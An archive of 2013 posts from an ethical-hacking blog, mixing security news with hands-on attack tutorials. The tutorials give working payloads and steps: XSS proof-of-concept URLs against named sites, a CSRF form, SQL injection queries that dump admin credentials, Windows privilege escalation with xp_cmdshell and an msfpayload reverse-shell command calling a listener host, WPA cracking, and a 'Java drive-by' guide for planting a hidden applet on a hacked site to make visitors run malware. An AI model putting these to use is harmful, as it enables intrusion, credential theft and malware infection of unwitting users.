Ethical Hacking - Rafayhackingarticles

Kali Linux DOM Based XSS Writeup

2013-05-20T01:32:00.000-07:00

Recently, I have been on a mission to find XSS in popular security training websites, Since these are the ones who care about their security the most. I have been successful in finding in almost all of them i have tried up to date, This one was a bit interesting to i thought to write a post on it, Basically it was not a reflected/stored xss, however it was a DOM based XSS, similar to the one i found in Microsoft. Unlike others, this particular XSS occurs in client side javascript.

In order to provide features to the users lots of webmasters/Vendors are moving their code towards client side, the data is embedded in the DOM and before it's reflected back to the user it is not filtered out, which results in a DOM based XSS. The main cause of this vulnerabilities are dangerous Sinks. DOM based XSS wiki is a good source where you would find dangerous sources and sinks.

On checking out the source of kali.org, i immediately found out that i was running wordpress version 3.5.1, The version is the latest version of the wordpress and has no known public vulnerabilities till date, therefore i moved towards testing plugins.

I tested couple of plugins, however did not find any one of them vulnerable, by analyzing the source more deeply i found a pretty interesting plugin "WP-Pretty Photo" which caught my interest. Which is a jquery based lightbox for wordpress platform.

While, searching for common vulnerabilities for wp-prettyphoto plugin i found that it was vulnerable to DOM Based XSS. So, i quickly added my payload to the url and bamn it triggered an XSS.

POC:

http://www.kali.org/#!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//

Some debugging with chrome JS console, led me to the line 79 of the jquery.prettyPhoto.js, the line of code which was responsible for the cause of the DOM Based XSS.

http://www.kali.org/wp-content/themes/persuasion/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=2.1

It was also obvious from the code that it required us ! sign to successfully execute the javascript.

The input inside the hashrel was not filtered out before it was being displayed to the user, which resulted in the DOM Based XSS.

The Fix

The following url discusses, about the fix:

https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc

If, this was not enough for you, then listen to this, Offensive-security team was very awesome in a sense, that they gave me a free voucher for their famous certification PWB 3.0.

I was really surprised to see that Dominator was not detecting it which is the only good tool for finding DOM Based XSS leaving IBM javascript scan apart, in past i have tried dominator against various websites suffering from DOM Based XSS and have found that, at some spots it's very good and at some spots it needs much improvement. Here is the screenshot:

I would like that every one would be act the same way i did and responsibly disclose every issue you find.

How Was 133day.com Hacked?

2013-05-16T13:16:00.001-07:00

Today, in the morning when i browsed to 1337day.com (The famous exploit buying/selling database), I was shocked to see 1337day defaced by famous turkish hacker group named "Turkguvenligi", In past Turkguvenligi has been responsible for defacements of lots of famous websites. Here is what appeared when i came across 1337day.com

On their defacement page, they told that they had asked 1337day to ban a fake user with author id =5819 but they refused to do so, As i browsed to http://www.1337day.com/author/5819, i website was first appeared to be inaccessible, later it showed the following message:

However, i used their mirror site 1337day.org to access the author link, Here is the screenshot:

By looking at the author name "Agd_Scorp", i understood the whole point of the dispute, Agd_Scorp is a well known hacker and founding member of "Turkguvenligi", He is responsible for lots of high profile defacements, If you take a look at his Zone-h record, it's pretty impressive, he has history of hacking into domain registrars.

It appears to me that some known was submitting exploits with the name of Agd_Scorp, They asked 1337day team to remove it, however they refused to remove it. Therefore they defaced their website.

How was 1337day.com hacked?

There have been issues in the past where 1337day, injectors etc and their mirror websites were hacked, but in all of those cases, their servers were never compromised, it was their domain registrar Moniker.com, which got compromised by the attackers.

The attackers, compromised moniker.com and changed their dns servers to their own dns servers, a story matching Google Pakistan hack, The 1337day team later confirmed on their facebook that their domain registrar was the victim of their attack not their DNS servers.

They have also asked webmasters not to invent stories that their server was hacked. They say it's impossible, I don't agree with them on this point. Even most secure systems can be compromised.

On performing a WHOIS lookup, I came to know that they have actually switched their hosting account from Moniker.com to hostgator.com

I have confirmed with hostgator that the dns servers for websitewelcome belong to them. We, will update you as soon as we have more information.

Anonymous Hackers Cause Significant Damage To Banking And Government Agencies

2013-05-08T04:05:00.001-07:00

A collective of hacker groups planed to attack the websites of major government agencies and banks on May 7 to protest American foreign policy.

For weeks, the groups, which include Anonymous, have used social media to publicize their planned operation, dubbed "#OpUSA."

Experts from USA(to cover up things) say that the attack was not well-planned and focused. On the other hand, twitter is full of #OpUSA tweets which tells us a different story. The hacker groups have compromised a large number of targets which as either owned by US government or its residents.

AnonGhost made a significant contribution to #OpUSA by taking down a large number of websites, emails, credit cards, etc. According to their pastebin post, hackers claim to hack-

- More than 700 websites (http://pastebin.com/zftTrrrh)
- More than 10k American credit cards(http://pastebin.com/D4QCynHC)
- 1 lac email accounts which belong to US residents (http://www45.zippyshare.com/v/58998013/file.html) 4. - More than 5000 facebook accounts(http://pastebin.com/NRvmnYFe)
- More than 12k email accounts of USA (http://www11.zippyshare.com/v/39103082/file.html)

The complete paste can be seen here(http://pastebin.com/RSqKCd1N).

The list of hacked sites mostly include high profile government websites from Australia, Ministry of environment Dominica, government of Argentina, Philippines, NGOs, universities and other educational institutions from Thailand Brazil, Russia, Israel, USA, Canada, UK, Romania, and Italy.

Most of the sites seem to be recovered but some of them are still now defaced, down or under maintenance.

We managed to ask the leader of AnonOps "Mauritania Attacker", also responsible for lots of high profile defacements, the purpose and the cause of the #OPUSA.

"I attack USA because they think that muslims are terrorist but the reality is that they themselves are the biggest terrorist and they declared war Against Islam and me as a Muslim i will stand against them even if i die " Mauritania Attacker said.

Mauritania Attacker is the leader of AnonOPS, He played a major role inside #OPISRAEL, along with it he is also responsible for other high profile attacks on lots of other organizations.

Note: RHA has no association with any of the hacktivists.

About The Author

Major Part of this article was contributed by a security researcher Deepanker Arora. Recently, He contributed an article on "Hacking Windows Servers".

SQL Injection With Update Query

2013-05-04T06:15:00.002-07:00

We have wrote couple of articles discussing various techniques and attack vectors for SQL Injection, We have already discussed Basic SQL Injection With Union Based, Blind SQL Injection, Time Based SQL Injection and also discussed common problems and their solutions related to SQL Injection. However, this time Daniel Max a regular reader of RHA will discuss about exploiting SQL Injection with Update Query.

Most of the tutorials, You see on the web usually explains to use the SELECT method in order to retrieve stuff from the database, But what if we wanted to update some thing that is already present in the database, For example a MD5 hash, that we are not able to crack, In order to gain access to the admin panel, We would simply run a update query and it will automatically update the password. We recommend you to atleast read little bit about MYSQL from w3schools.com, before proceeding with this tutorial as this tutorial is not for complete beginners.

Requirements

Tamper Data
Burp Suite
Know how of MySQL (w3schools.com recommended)

So, Below is a screenshot of the form which we want to update, What we want to update is the Email address with our SQL Injection.

Vulnerable parameter is "E-mail format: " value.We would use Tamper data to intercept and change the values.

Here is a screenshot:

After we click ok we get an error the following error:

First we want to find the exact database version, but what would be the easiest way.

We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use "fname" , which is string value. Database query output will be shown inside "First name" input box (where it says MaXoNe).

Screenshot of version query:

Screenshot of the rendered content with database answer:

Now that we know how to create our query, lets get the tables.

Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '

Tables Query:

Screenshot of the rendered content with database answer:

Three tables, strange !? Lets check that again.We use count.

Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '

Screenshot of get tables count query:

Screenshot of the rendered content with database answer:

Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs.
We use Burp Suite intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers"

Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '

Screenshot of burp settings:

Thats it. And now you just get columns the same way with Burp Suite.

Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '

Just increment n with Burp Suite.

Values :

Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '

Just increment n with Burp Suite.

That's it , simple and yet effective . I used this because , waf blocked -- and --+ so I wasn't able to close and comment out query.

About The Author

This article has been written by Daniel Max, He is a security researcher from Bosnia, He is willing to actively contribute to RHA.

Hacking Windows Servers - Privilege Escalation

2013-04-26T08:54:00.001-07:00

Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.

But, these get the job done only on Linux servers. What about windows servers?

Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.

Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
Using meterpreter payload to get a reverse shell over the target machine.
Using browser_autopwn. (Really...)
Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell-

Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.

If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.

You must be wondering why only "sa"?

Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.

The picture below shows the connection string containing login credentials of "sa" account.

Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.

So, after getting the "sa" account, we can login remotely using HeidiSQL

HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.

After logging into MSSQL server with sa account, we get a list of databases and their contents.

Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

Syntax for the query is-

xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-

xp_cmdshell 'whoami'

This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.

Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.

2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.

Using metasploit, generate a reverse shell payload binary.

For example-

msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.

Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)

Now it's time to execute the payload.

If everything goes right, we will get a meterpreter session over the target machine as shown below-

We can also use php, asp or other payloads.

3. Browser Autopwn-

This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.

Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.

I think it is clear by now that what I'm trying to explain ;)

We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for this-

iexplore.exe [URL]

Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

4. Using readily available tools-

Tools like pwdump and mimikatz can crack passwords of windows users.

#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.

The following screenshot shows NTLM hashes from pwdump7:

#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.

Following picture shows plain text passwords from mimikatz:

You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.

I hope you can now exploit every another windows server.

Happy Hacking :)

About The Author

This article has been written by Deepankar Arora, He is an independent security researcher from India, He has been listed in various hall of fames.

Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera

2013-04-17T10:20:00.000-07:00

Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.

I reported few vulnerabilities to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the vulnerabilities are as follows:

Stored XSS

The "Username" input was not being sanitized properly, Which resulted in an execution of javascript.

CSRF POC

The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.

POC

<html>

<body>
<form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
<input type="hidden" name="email" value="rafaybaloch@gmail.com" />
<input type="hidden" name="name" value="Rafay Baloch" />
<input type="hidden" name="address1" value="f-10,afasf afs asf 1,block 15 near income tax office,asssssss-e-johar" />
<input type="hidden" name="address2" value="" />
<input type="hidden" name="city" value="Karachi" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="country" value="PK" />
<input type="hidden" name="zip" value="44000" />
<input type="hidden" name="phone" value="+923333333333" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

Opera Hall Of Fame

So, For my findings, Opera listed my name under their hall of fame:

Gift from Opera

As a token of appreciation, they also send me the following gifts:

Opera is still sending some good stuff, I would recommend researchers to start looking opera's subdomains for low hanging fruits such as XSS, I know there is a lot of vulnerabilities out there unfixed.

Won Network Designing Competition At PROCOM 2013

2013-04-15T13:57:00.001-07:00

I am sorry friends as i haven't been able to post as i was really busy with some pentesting projects and my research. Now a days doing more learning part than teaching part. When i came in to hacking scene 6 years before, I started with Network security, but later every thing shifted to layer 7 i.e. web. So i started researching web application security. However, a since network and web work together, we cannot completely deny the network security part.

Recently,We participated in "PROCOM 2013" on behalf of Bahria University karachi (Team name = White Tigers) along with my two friends "Mudassir" and "Zia khan" and by the grace of Almighty Allah we managed to win the competition. Procom is the largest educational event that takes place every year in Fast University, it hosts more than 40 competition including speed programming, network designing, painting etc etc.

The competition was based on 5 rounds, which would test both theoretical and practical knowledge of the students. The major advantage was that lots of questions came from network security, which b.w i have been studying for few years. The things i learned from my CCNP route course also came into play and helped me a lot. My friend mudassir did really well too, he is dong his CCIE and is very sound in networking stuff.

What's Next?

Well, I would continue my research with Network and web application security, I am also writing a book on "Advanced Ethical Hacking", which b/w i am hoping to finish it this year. However apart from that, i would also move to programming side and participate in "Speed Programming Contest" and atleast winning it once.

I would love to hear from you the suggestions on improving at speed programming, either leave a comment or mail me directly at rafayhackingarticles@gmail.com.

Hijacking An Aircraft With An Android App

2013-04-14T23:16:00.004-07:00

Well vulnerabilities that never going to end, or should we say vulnerabilities and new inventions walk side by side.
Recently a terrifying prospect, a hack that allows an attacker to take control of plane navigation and cockpit systems has been revealed at a security conference in Europe. An Android application called PlaneSploit that would allow remotely attack and hijack commercial aircraft. This app is developed by Hugo Teso, a researcher at security consultancy N.Runs in Germany who's also a commercial airline pilot.

He further added,"He explained that by building an exploit framework called Simon and a complimentary Android app that delivers attack messages, he could manipulate a plane's path as he saw fit."
With these vulnerabilities in mind, he used virtual planes in a lab to demonstrate his ability to hijack a plane rather than attempting to take over a real flight as that was “too dangerous and unethical.” He used ACARS to gain access to the plane’s onboard computer system and uploaded Flight Management System data.

"I expected them to have security issues but I did not expect them to be so easy to spot. I thought I would have to fight hard to get into them but it was not that difficult," Teso said.

Zeus Master turned down Israel

2013-04-09T14:52:00.000-07:00

Recently worldwide Hackers started #OpIsrael and targeted Israeli websites, which caused massive disruption to government, academic and private sites. According to the news/Media Israel asked Algerian Hamza the happiest hacker to intervene to save Israel from the heavy losses in exchange for his release, but he refused to help them.

Hamza who hacked sensitive sites in the U.S. and then arrested by Interpol, US authorities accuse him of hacking into private accounts in more than 217 banks and financial companies worldwide, causing millions of dollars in losses. He was arrested in Thailand when he was traveling with his family following a holiday in Malaysia en route to Cairo, Egypt.

"The arrest warrant specifically mentioned that bail is not allowed.'' The court said.

About the author

This article has been written by Fahad Awan, He is the newest author on RHA team.

Anotomy of The Largest DDOS Attack That Almost Took Down The Internet

2013-04-04T07:17:00.000-07:00

Recently, the largest DDOS attack in the history of the internet has been noticed, According to the reports from various websites; the attack was of more than 300GB/second. It all started when Spamhaus(NON PROFIT ORGAZNIATION) that manages the spam filters for various websites blacklisted a Dutch based webhosting company Cyberbunker, Cyberbunker allows a user to host everything else than Child pornography and stuff related to terrorism. This allows an attacker to host any malicious software such as botnet. A botnet can be used for variety of purposes ranging from stealing credit card information, infecting PC's to even denial of service attacks.
In a interview with bbc, Spamhaus blamed the Cyberbunker for the ongoing attacks, they said that Cyberbunkers have joined hands with attackers to perform DDOS attacks in order to compromise the availability.

The attack was a Denial of service attacks, which is often used by attackers to compromise the availability of the website by flooding the website with huge number of packets (In most cases), The DDOS attack was aimed at the DNS servers of Spamhaus, A DNS server is responsible for the translation of an IP address to domain name, In simple words, When we are accessing any website on the internet, on the back end we are actually accessing the IP address, DNS simplifies the process.

The experts call the attack as the biggest DDOS attack in the history of the internet, Normally, when we talk about a massive DDOS attack against huge infrastructures, It ranges from
30 to 50 GB per second of traffic, however this attack was more than 300gbps per traffic. The company moved to Cloudfare (A web performance and security company) in order to protect their services from been taken down, Initially they were receiving 10GBPS of traffic, but it got even the worse the attack and the highest peak noted was around 300GBPS. However, instead of going after Spamhaus the attackers targeted Cloudfare itself, the attackers failed to knock Cloudfare servers, even after a 100GIGS of traffic, after that they targeted the bandwidth providers of Cloudfare known as "Tier2", who itself buy bandwidth from Tier1 provider. The major traffic load was carried out by Tier1, which reported more than 300GBPS of traffic, making it the largest DDOS attack ever.

Now, one might think that, how is it slowing down the internet?, it's because, this is how the internet works as internet is simply a collection of networks, Let's say, when we are connecting to google.com from Pakistan, our browser sends a http requests, the browser sends/receives a packets which are hopped across lots of routers/networks in between until they reach the Google servers. As mentioned previously Tier2 buys bandwidth from Tier1, Tier1 connects to other Tier1 providers to ensure that all the networks are connected with each other.Tier1 providers are the core of the internet, the Tier1 provider ended up suffering all the traffic. It is reported by Cloudfare that Tier1 providers for Europe were affected, as a reason of which, internet slowdown was noticed for people surfing the internet in those areas. However, In Pakistan, the severity was very low, therefore major slow down was not noticed.

Lots of Pakistani websites are hosted abroad, the following is the list of them:

www.pakistan.gov.pk (Main Pakistan Government Portal)
www.infopak.gov.pk (Ministry of Information and Broadcasting)
www.interior.gov.pk (Ministry of Interior)
www.e-government.gov.pk (E Government Directorate)
www.pta.gov.pk (Pakistan Telecom Authority)
www.pc.gov.pk (Planning Commission)
www.sindh.gov.pk (Government of Sindh)

As as result of the outage they are suffering the outage and lots of Pakistani users are not able to access the websites, If we host these servers in Pakistan, Initially the attack would be mitigated, however it would raise a lot of security concerns, Since Pakistani servers would be more easy for attackers to compromise and knock them off, due to poor security and patch management. Also, I don't see any of the protection against DOS attacks; perhaps if they could acquire Cloudfare protection services, the DOS attacks would be mitigated easily.

HTTPS Cracked! SSL/TLS Attacked And Exploited

2013-04-01T05:49:00.000-07:00

People who blog about ethical hacking have a very sincere relationship with Cryptographers. They (the Cryptographers) keep bringing in something delightful into the everyday nonsense and we blabber about their accomplishments until its squishy and old - this love goes far beyond then can be comprehended by normal folk. No offence.
It seems like they have swept us off our feet again and this time around, they are flaunting the big guns. Cryptographers have targeted SSL/TLS and done some serious damage to HTTPS. Transport Layer Security didn't face a major blow during the attack as it requires to capture millions and billions of connections consisting of the same plaintext. But this highlights a major issue present in using the RC4 encryption algorithm.

RC4 uses the same key for encryption and decryption, whereas TLS uses a public/private key pair for encryption and decryption which makes it lag therefore it uses a hybrid approach. TLS connection can be setup using public/private key pairs and once established can share encrypted data over a secure network that uses ciphers for encrypting data such as AES, DES, Triple-DES, Blowfish, RC4, etc.

RC4 has been advised against many times in the past but its also a fact that it brings in half of all TLS traffic. So, the attack was done on a part of TLS by AlFardan-Bernstein-Paterson-Poettering-Schuldt (AIFBPPS).

According to NakedSophos team;

RC4 is a stream cipher, so it is basically a keyed cryptographic pseudo-random number generator (PRNG). It emits a stream of cipher bytes that are XORed with your plaintext to produce the encrypted ciphertext.
To decrypt the ciphertext, you initialise RC4 with the same key, and XOR the ciphertext with the same stream of cipher bytes. XORing twice with the same value "cancels out", because k XOR k = 0, and because p XOR 0 = p.

RC4 generates a statistically anomalous output initially in each stream of cipher bytes. Therefore it is not a high-quality cryptographic PRNG. This phenomenon was first observed by Itsik Mantin and Adi Shamir in 2001. They noticed that during the second output byte the value zero turned up twice as often as it should; 256 keys on average to be precise with a probability of 1/128. This resulted in WEP being attacked which was then replaced by WPA.

AIFBPPS have taken this attack further than anyone else "producing statistical tables for the probability of every output byte (0.255) for each of the first 256 output positions in an RC4 cipher stream, for a total of 65535 (256x256) measurements."

According to NakedSophos team;

By using a sufficiently large sample size of differently-keyed RC4 streams, they achieved results with sufficient precision to determine that almost every possible output was biased in some way.
The probability tables for a few of the output positions (which are numbered from 1 to 256) are show below.
The authors realised that if you could produce TLS connections over and over again that contained the the same data at a known offset inside the first 256 bytes (for example an HTTP request with a session cookie at the start of the headers), you could use their probability tables to guess the cipher stream bytes for those offsets.

Here's a brief description of how it works by NakedSophos team:

"Imagine that you know that the 48th plaintext byte, P₄₈, is always the same, but not what it is.

You provoke millions of TLS connections containing that fixed-but-unknown P₄₈; in each connection, which will be using a randomly-chosen session key, P₄₈ will end up encrypted with a pseudo-random cipher byte, K₄₈, to give a pseudo-random ciphertext byte, C₄₈.

And you sniff the network traffic so you capture millions of different samples of C₄₈.

Now imagine that one value for C₄₈ shows up more than 1% (1.01 times) more frequently than it ought to. We'll refer to this skewed value of C₄₈ as C'.

From the probability table for K₄₈ above, you would guess that the cipher byte used for encrypting P to produce C' must have been 208 (0xD0), since K₄₈ takes the value 208 more than 1% too often.

In other words, C' must be P XOR 208, so that P must be C' XOR 208, and you have recovered the 48th byte of plaintext.

The guesswork gets a little harder for cipher stream offsets where the skew in frequency distribution is less significant, but it's still possible, given sufficiently many captured TLS sessions.

AlFBPPS measured how accurate their plaintext guesses were for varying numbers of TLS sessions, and the results were worrying, if not actually scary:

"However, given the huge number of TLS sessions required, The Register's provocative URL theregister.co.uk/tls_broken might be going a bit far.

Initiating 2³² (4 billion), or even 2²⁸ (260 million), TLS sessions, and then sniffing and post-processing the results to extract a session cookie is unlikely to be a practicable attack any time soon.

If nothing else, the validity of the session cookie might reasonably be expected to be shorter than the time taken to provoke hundreds of millions of redundant TLS connections.

On the other hand, the advice to avoid RC4 altogether because of its not-so-random PRNG can't be written off as needlessly conservative.

If you can, ditch RC4 from the set of symmetric ciphers your web browser is willing to use, and your web servers to accept.

Go for AES-GCM instead.

GCM, or Galois/Counter Mode, is a comparatively new way of using block ciphers that gives you encryption and authentication all in one, which not only avoids the risky RC4 cipher, but neatly bypasses the problems exposed in the Lucky 13 attack, too."

Cheers!

About the Author:

This Article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

How To Crack A WPA Key With Aircrack-ng

2013-03-29T12:45:00.000-07:00

With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).

Network Adapter I am going to use for WPA/WPA2 cracking is Alfa AWUS036H , OS# Backtrack 5R2

Step 1 : Setting up your network device

To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:
Command # iwconfig (to find all wireless network interfaces and their status)

Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)

Step 2 : Reconnaissance

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:

Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range.

Step 3 : Capturing Packets

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:

Command # airodump-ng -c 1 bssid AP_MAC -w data mon0

Step 4 : De-Authentication Technique

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client.

So, now we have successfully acquired a WPA Handshake.

Step 5 : Cracking WPA/WAP2

Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.

Command # aircrack-ng -w wordlist ‘capture_file’.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)

Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.

About The Author

Shaharyar Shafiq is doing Bachelors in Computer Engineering from Hamdard University. He has done C|PTE (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics.

Java Hits Another Roadblock - Found To Be A Threat For Browsers

2013-03-28T04:12:00.000-07:00

Java has been the most talked about application in the past couple of months. Not because of its functionality but due to its inability to refrain from being attacked and exploited. Oracle has released emergency security patches to deal with the vulnerabilities in Java but to no avail. Java has been attacked over and over again by free-rollers and experts alike using various tactics.

According to a report about a 100 million PCs are vulnerable to various attacks leading to unauthorized access through Java's unstable software. If things weren't bad enough for the software already, Department of Homeland Security issued a warning to all PC users to disable Java on their systems.

Experts at Websense decided to do a little bit of research on the topic. Therefore, coming up with a list of Java vulnerabilities, versions affected etc.

According to Websense;

It is probably no surprise that the largest single exploited vulnerability is the most recent one, with a vulnerable population of browsers at 93.77%. That's what the bad guys do — examine your security controls and find the easiest way to bypass them. Grabbing a copy of the latest version of Cool and using a pre-packaged exploit is a pretty low bar to go after such a large population of vulnerable browsers.

Most browsers are vulnerable to a much broader array of well-known Java holes, with over 75% using versions that are at least six months old, nearly two-thirds being more than a year out of date, and more than 50% of browsers are greater than two years behind the times with respect to Java vulnerabilities. And don't forget that if you're not on version 7 (which is 78.86% of you), Oracle won't be sending you any more updates even if new vulnerabilities are uncovered.

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

DOM Based XSS In Microsoft

2013-03-20T05:11:00.001-07:00

Lately, i have been researching on DOM based XSS a bit, In my previous post i talked about the DOM based XSS i found inside AVG, DOM based XSS is caused due to lack of input filtering inside client side javascripts, since most of the code is moving towards client side, therefore DOM based xss have been very common now a days, It is predicted by the experts that the DOM based xss mostly occurs in the websites that heavily rely upon javascripts.

I have reported several DOM based XSS inside Microsoft, most of them were due to the lack of input filtering/sanitization inside of the several tracking scripts such as sitecatalyst and riotracking scripts as they often introduce some vulnerable sources and sinks. With that being said, let's take a look at the POC of the attack:

The vulnerability occurs due to lack of filtering being done inside riotracking script (Line 58), There are other microsoft domains that are also using the same tracking script vulnerable to DOM based XSS, see if you can find one?.

How Attackers Spread Malware With Java Drive by?

2013-03-19T12:27:00.002-07:00

Hello RHA fans,

We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff. But cheers up my friend there's no end, i will show you a very effective methods that attackers use to spread malicious viruses/worms.

Well In this tutorial RHA will show you to spread virus with JAVA DRIVE BY!

What is java drive by:

A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this:

Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job.

Tools we need in this game are:

i) a .jar file which is the main player of this game. Download it from here http://www.mediafire.com/?mmafl2carb1s159
ii) A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page.
iii) A java script which is the backbone of your game.

Now lets get started, Upload you .jar file on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear

Java Code:

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe">

So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:

So this is it! Simplest and most effective method used by attackers to spread your malicious software.

About the author

This article has been written by fahad awan, He is the newest author on RHA team. We wish him best of luck with his tutorials.

Cisco ZeroClipboard Swf File XSS

2013-03-15T09:17:00.002-07:00

The security of the target website depends upon the number of vectors an attacker knows, The more vectors an attacker knows the more chances he would have for compromising your website. One of the reasons why i have managed to secure my places in most of the security hall of fames was that i did not tried a single attack vectors, i tested a the target for lots of different attack vectors, one of them was swf. swf files are commonly found on mots of the websites. Though there are lots of other vulnerabilities for swf files, however i would stick to the topic of this post and would leave other's for upcoming posts.
Recently, i was testing cisco for potential vulnerabilities, initially i took tested for SQLi, XSS, CSRF and other attacks, but was out of luck. Therefore, i decided to test it for swf file vulnerabilities. One of the common swf vulnerabilities i look for inside a website is for "ZeroClipboard Xss".

What Is ZeroClipboard?

The ZeroClipboard library provides an easy way to copy text to the clipboard using an invisible Adobe Flash movie, and a JavaScript interface. The "Zero" signifies that the library is invisible and the user interface is left entirely up to you.

I used google to search, if any of cisco's subdomain or cisco.com itself contain this file, luckily i found the path to bx.cisco.com that contained zeroclipboard.xss. So i began testing for XSS and bingo it worked.

Cisco Swf POC

http://bx.cisco.com/cbx-portal/js/zeroclipboard/ZeroClipboard.swf#?id=\"))}catch(e){alert(/XSSbyrafay/.source);}//&width=500&height=500

Vulnerable Code

public function ZeroClipboard()
{ .... var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters; id = flashvars.id; ....
ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);

As you can look from the above code is that id parameter from Externalinterface.call is passed to the second parameter, without being properly sanitized. Therefore it results into an XSS.

Further Reading

If you are really interested in learning about zeroclipboard xss, i would recommend you read the following articles:

http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html
https://github.com/jonrohan/ZeroClipboard/issues/14

Vulnerability Discovered In iPhone - Poses Serious Threat To Users

2013-03-14T12:09:00.000-07:00

Another vulnerability has been discovered on iPhone that could allow hackers to remotely control it. Skycure, an Israeli company, states it to be a major flaw in iOS configuration which could post a malware threat.

